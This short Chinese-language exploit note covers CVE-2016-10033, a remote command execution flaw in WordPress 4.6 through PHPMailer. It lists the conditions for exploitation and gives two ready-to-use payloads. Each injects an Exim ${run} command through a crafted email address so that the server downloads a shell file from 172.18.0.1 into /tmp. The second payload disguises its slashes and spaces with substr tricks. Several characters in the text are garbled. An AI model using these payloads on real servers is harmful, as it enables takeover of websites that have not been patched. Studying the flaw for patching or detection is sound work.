【初级】WordPress 4.6 任意命令执行漏洞

CVE-2016-10033
漏洞描述：WordPress 使用 PHPMailer 组件向用户发送邮件。PHPMailer(本 ＜5,2.18)存在远程命令执行漏洞，攻击者只需巧炒地构造出一个恶意邮箱地址，即可写入任意文件，造成远程命令执行的危書。
利用条件

沉洞利用条件：

不能包含特殊字符

命令需为小写

命令需使用绝对路径

需要知道现有用户名

注意点：命令只在服务器端执行命令、不会显示在容户端

Payload：

aa(any -froot@localhost -be ${run{/usr/bin/wget --output-document /tmp/shell 172.18.0.1/zk/shell.txt}} null)

aa(any -froot@localhost -be ${run{${substr{0}{1}{$spool_directory}}usr${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}wget${substr{10}{1}{$tod_log}}--output-document${substr{10}{1}{$tod_log}}${substr{0}{1}{$spool_directory}}tmp${substr{0}{1}{$spool_directory}}shell${substr{10}{1}{$tod_log}}172.18.0.1${substr{0}{1}{$spool_directory}}zk${substr{0}{1}{$spool_directory}}shell.txt}} null)

参考资料：

• https://www.freebuf.com/vuls/319313.html
• https://xz.aliyun.com/t/2301
• https://github.com/liusec/WP-CVE-2016-10033